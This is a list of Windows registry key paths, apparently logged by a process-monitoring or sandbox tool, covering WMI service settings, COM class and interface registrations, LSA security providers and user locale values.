HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold3Mult
HKEY_LOCAL_MACHINE\system\Setup
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Unchecked Task Count
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\LastServiceStart
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Working Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Repository Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Build
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\MOF Self-Install Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Default Repository Driver
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueCoreFsrepVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Repository Cache Spill Ratio
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\CheckPointValue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SnapShotValue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\CheckRepositoryOnNextStartup
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\NumWriteIdCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Class Cache Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Class Cache Item Age (ms)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableObjectValidation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\NextAutoRecoverFile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Enable Provider Subsystem
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client\{29C33724-2DB4-437F-8D9F-CF610068A4BF}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{29C33724-2DB4-437F-8D9F-CF610068A4BF}\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{29C33724-2DB4-437F-8D9F-CF610068A4BF}\Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{29C33724-2DB4-437F-8D9F-CF610068A4BF}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{29C33724-2DB4-437F-8D9F-CF610068A4BF}\Locale
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{29C33724-2DB4-437F-8D9F-CF610068A4BF}\User
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{29C33724-2DB4-437F-8D9F-CF610068A4BF}\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{29C33724-2DB4-437F-8D9F-CF610068A4BF}\ProcessIdentifier
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client\{96588179-8AB1-4680-A060-9972C564941C}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{96588179-8AB1-4680-A060-9972C564941C}\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{96588179-8AB1-4680-A060-9972C564941C}\Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{96588179-8AB1-4680-A060-9972C564941C}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{96588179-8AB1-4680-A060-9972C564941C}\Locale
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{96588179-8AB1-4680-A060-9972C564941C}\User
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{96588179-8AB1-4680-A060-9972C564941C}\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{96588179-8AB1-4680-A060-9972C564941C}\ProcessIdentifier
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client\{BC163476-C110-4E13-9913-33CDA73BED4B}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{BC163476-C110-4E13-9913-33CDA73BED4B}\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{BC163476-C110-4E13-9913-33CDA73BED4B}\Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{BC163476-C110-4E13-9913-33CDA73BED4B}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{BC163476-C110-4E13-9913-33CDA73BED4B}\Locale
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{BC163476-C110-4E13-9913-33CDA73BED4B}\User
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{BC163476-C110-4E13-9913-33CDA73BED4B}\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{BC163476-C110-4E13-9913-33CDA73BED4B}\ProcessIdentifier
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client\{FE821036-CBC7-4828-AF72-786292D4B041}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{FE821036-CBC7-4828-AF72-786292D4B041}\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{FE821036-CBC7-4828-AF72-786292D4B041}\Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{FE821036-CBC7-4828-AF72-786292D4B041}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{FE821036-CBC7-4828-AF72-786292D4B041}\Locale
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{FE821036-CBC7-4828-AF72-786292D4B041}\User
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{FE821036-CBC7-4828-AF72-786292D4B041}\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{FE821036-CBC7-4828-AF72-786292D4B041}\ProcessIdentifier
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\ProcessIdentifier
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableEvents
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssToBeInitialized
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Low Threshold On Events (B)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\High Threshold On Events (B)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Wait On Events (ms)
HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\ESS
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Merger Query Arbitration Enabled
HKEY_LOCAL_MACHINE\software\microsoft\wbem\cimom
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SetupDate
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\CIMOM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\FinalizerBatchSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ClientCallbackTimeout
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\FinalizerQueueThreshold
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Tasks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Async Result Queue Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssNeedsLoading
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\List of event-active namespaces
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\ESS\//./root/subscription
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\SecurityCenter2
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\SecurityCenter2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\ESS\//./root/CIMV2
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler
HKEY_CLASSES_ROOT\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\(Default)
HKEY_CLASSES_ROOT\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\Synchronization
HKEY_CLASSES_ROOT\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\AppId
HKEY_LOCAL_MACHINE\Software\Microsoft\OleAut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\ESS\//./root/CIMV2\SCM Event Provider
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\minint
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\cimv2
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\cimv2
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\Synchronization
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\AppId
HKEY_CLASSES_ROOT\CLSID\{d63a5850-8f16-11cf-9f47-00aa00bf345c}\InProcServer32
HKEY_CLASSES_ROOT\CLSID\{d63a5850-8f16-11cf-9f47-00aa00bf345c}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\InprocServer32\Synchronization
HKEY_CLASSES_ROOT\CLSID\{d63a5850-8f16-11cf-9f47-00aa00bf345c}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\AppId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SecuredHostProviders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SecuredHostProviders\ROOT\CIMV2:__Win32Provider.Name="CIMWin32"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\Root
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\Root
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F50A28CF-5C9C-4F7E-9D80-E25E16E18C59}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F50A28CF-5C9C-4F7E-9D80-E25E16E18C59}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F50A28CF-5C9C-4F7E-9D80-E25E16E18C59}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEC1B0AC-5808-4033-A915-C0185934581E}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEC1B0AC-5808-4033-A915-C0185934581E}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEC1B0AC-5808-4033-A915-C0185934581E}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{7C857801-7381-11CF-884D-00AA004B2E24}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{7C857801-7381-11CF-884D-00AA004B2E24}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{7C857801-7381-11CF-884D-00AA004B2E24}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Sink Transmit Buffer Size
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Cimom
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\DefaultRpcStackSize
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA\AccessProviders
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\wmiprvse.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\InprocHandler
HKEY_CURRENT_USER\Control Panel\International\LocaleName
HKEY_CURRENT_USER\Control Panel\International\sCountry
HKEY_CURRENT_USER\Control Panel\International\sList
HKEY_CURRENT_USER\Control Panel\International\sDecimal
HKEY_CURRENT_USER\Control Panel\International\sThousand
HKEY_CURRENT_USER\Control Panel\International\sGrouping
HKEY_CURRENT_USER\Control Panel\International\sNativeDigits
HKEY_CURRENT_USER\Control Panel\International\sCurrency
HKEY_CURRENT_USER\Control Panel\International\sMonDecimalSep
HKEY_CURRENT_USER\Control Panel\International\sMonThousandSep
HKEY_CURRENT_USER\Control Panel\International\sMonGrouping
HKEY_CURRENT_USER\Control Panel\International\sPositiveSign
HKEY_CURRENT_USER\Control Panel\International\sNegativeSign
HKEY_CURRENT_USER\Control Panel\International\sTimeFormat
HKEY_CURRENT_USER\Control Panel\International\sShortTime
HKEY_CURRENT_USER\Control Panel\International\s1159
HKEY_CURRENT_USER\Control Panel\International\s2359
HKEY_CURRENT_USER\Control Panel\International\sShortDate
HKEY_CURRENT_USER\Control Panel\International\sLongDate
HKEY_CURRENT_USER\Control Panel\International\iCountry
HKEY_CURRENT_USER\Control Panel\International\iMeasure
HKEY_CURRENT_USER\Control Panel\International\iPaperSize
HKEY_CURRENT_USER\Control Panel\International\iDigits
HKEY_CURRENT_USER\Control Panel\International\iLZero
HKEY_CURRENT_USER\Control Panel\International\iNegNumber
HKEY_CURRENT_USER\Control Panel\International\NumShape
HKEY_CURRENT_USER\Control Panel\International\iCurrDigits
HKEY_CURRENT_USER\Control Panel\International\iCurrency
HKEY_CURRENT_USER\Control Panel\International\iNegCurr
HKEY_CURRENT_USER\Control Panel\International\iCalendarType
HKEY_CURRENT_USER\Control Panel\International\iFirstDayOfWeek
HKEY_CURRENT_USER\Control Panel\International\iFirstWeekOfYear
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LsaExtensionConfig\SspiCli
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\LsaExtensionConfig\SspiCli\CheckSignatureDll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\LsaExtensionConfig\SspiCli\CheckSignatureRoutine
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SecurityProviders
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\SspiCache
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Comment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Capabilities
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\RpcId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Version
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\TokenSize
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\SaslProfiles
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextLockCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextListCount
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\LocaleName
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sCountry
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sList
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sDecimal
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sThousand
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sGrouping
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sNativeDigits
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sCurrency
